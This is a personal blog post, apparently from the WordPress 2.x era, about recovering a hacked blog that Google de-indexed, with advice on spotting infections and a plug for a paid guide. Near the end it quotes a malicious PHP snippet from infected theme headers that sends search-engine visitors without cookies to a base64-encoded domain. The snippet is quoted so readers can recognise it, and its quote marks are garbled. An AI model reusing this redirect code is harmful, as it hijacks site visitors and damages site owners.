I know, WP experts will advise me that it wasn’t magic but rather misbehavior of a dormant plugin or something else I did or misjudged. And I acknowledge that: remember, I blog for the pleasure of sharing ideas and news and am not a technical writer.

Ahem. That said, I am a pretty geeky chick, but sometimes these updates just seem like a magical mystery tour.

Yesterday I discovered I’d been largely de-indexed by Google (again) due to a hacker’s evil redirect. Now, this has happened before so I calmly investigated my code upon noticing a dramatic SERP drop. Spotting the offending base-64 code, I sliced it out and wrote a request for reconsideration to Google.

But then I faced the inevitable: I have to update WordPress again, if only for security purposes.

I used ftp to manually perform this update and immediately encountered a number of error messages. I sorted them out in short order and had most everything humming again within a couple of hours.

The only remaining big mess was the admin panel which wasn’t seeing its intended CSS and image files.

A colleague recommended reinstallation of the wp-admin files. This cleaned up the admin panel, but the visual editor was still inoperable. A reinstall of the wp-includes files seems to have been the answer. After trying for a number of hours to find the right fix, I’m lucky that these two simple tasks solved my issues. In looking for solutions, I found scads of good folks recommending things to try, with just as many people still looking at error codes after trying numerous fixes.

Over the next month other newts and toads will surely appear and I will wave my magic WordPress wand and say a few incantations, banishing all new forms of evil. Remember, 2.8 was just released, so those of us who jump in this soon are taking some risks.

This is a good learning opportunity for me when I’m working with my own site. But what if you are a web developer offering WP installs and customization for clients? Can one disclaim future issues, or must he or she assume responsibility for repairing any subsequent hacks or tricky updates?

There are far too many variables to make this a predictable and easy process: just check the various forums and other blogs where users document their experiences.

We all use different themes and plugins, which many of us customize endlessly, and our files surely contain some deprecated coding.

I remain a stalwart fan of WordPress but struggle to explain the nature of this beast when speaking with clients.

What do YOU do?

There are a lot more of us out there on our own these days, and it’s hard to do it all in a solopreneur office.

Especially for entrepreneurs and Do-It-Yourself types, “Unraveling Web Development” may be the kick in the pants you need to either get on with it, or finally make the decision to outsource your project.

Whichever camp you’re in, you can be implementing the tips in this guide in no time: just go to the simplified PayPal order form here.

Just fill in the form like this:

Item: Unraveling Web Development
Amount: $15.00

Or, if you have questions or would like to see a sample page, just contact me here: ktcosmos-at-LooseEnds-dot-net.

Though I use Google’s Webmaster Tools regularly (which is where one finds messages from Google about misbehaving sites), I never did hear from Google in writing about the issue. I just noticed that I was gone from the SERPs, practically overnight, and traffic was way down, which are classic symptoms of this latest round of hacks.

Presume that Google is way overloaded dealing with these issues, and they conveyed their, uh, concern for my site by removing me from the SERPs in the first place

If you think you may have been hacked, or if you haven’t and want to make sure you aren’t, here are some things to look out for:

Has your blog vanished from the search engine listings and your traffic fallen off tremendously?
I had some medical issues which kept me occupied and away from my blog for awhile. I naively concluded I just need to write more to build them back up. Don’t make that assumption. Start looking at Google’s cached version of your site and you may be in for an unpleasant surprise.

Patting yourself on the back for running the latest version of WordPress?
Even though you may be running the latest version of WP, you may have been infected prior to upgrading and not know it. I upgraded on May 29 to WP 2.5.1; I think I was hacked on 4/25, and those nasty files clung to my site files during the upgrade. You have to remove them manually.

Losing Focus.
In the midst of searching for and carving out compromised files, I read some discussions on Google’s definition of duplicate content. Probably not a good idea to start tackling other issues in the midst the hack abatement, but not thinking clearly, I sped off in that direction.

I revamped the way WordPress displays my page content to make certain I wasn’t violating that guideline, quickly building a new freestanding index page from instructions I found in the WordPress codex and at dailyblogtips.com (thanks to a tip from a fellow IVAA member, Laura Nieberding. Thanks, Laura!).

Right after putting the finishing touches on that and patting myself for taking measures NOT to display duplicate page content, I returned hack abatement.

The next tip I read about concerned base64 code and cookies that might be installed in the head area of infected WordPress theme files. I had already checked for those and, at THAT point, wasn’t affected.)

But wait a minute…

To build my new archives page, I had just grabbed two files from one of the default theme folders on my Theme folder, to create my new archives page, since my own theme didn’t include those files.

Hideously, I opened those files up and, the base 64 and cookies redirection malicious code was embedded at the top of the header code. Here’s the code you are looking for (thanks to bloggerguide.net):
< ?php \
$seref=array(�google�,�msn�,�live�,�altavista�,
�ask�,�yahoo�,�aol�,�cnn�,�weather�,�alexa�);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=�1?; break; }
if($ser==�1? && sizeof($_COOKIE)==0){ header(�Location: http://�.base64_decode(�YW55cmVzdWx0cy5uZXQ=�).�/�); exit;
}?>

In ignorance, I presumed that these default themes were installed (or installed over the top of previous versions) when I upgraded to 2.5.1. So, sliced that out, and continued down the list.

Be sure to notify Google of your efforts to remove offending code.
I wrote three separate “Request for Reconsideration” notes to Google, as I discovered more and made more inroads in digging out the offending code. Maybe overkill but I wanted to let them know I was working as hard as I could at eradicating that crap.

Report hidden code spam.
Google has a form you can use to report spammers, and those who employ hidden code, hidden links, and redirects. If someone embedded these in your site, find the embedded links and send thoseis a form you can fill out listing any offending web site that may have embedded code in your site, via a redirection. I sliced out an example of the hidden links, showing where they were redirecting to, in case that helped Google amass info on how these hacks are being accomplished.

I am not skilled in php, and am an average or below user of CSS. I do not want to be expert in hack abatement. Also, because I am a Mac user, I am largely inexperienced in dealing with hacks and viruses, etc.

What should others like me do about running blogs in view of the risk management and damage control that blogging seems to require now days???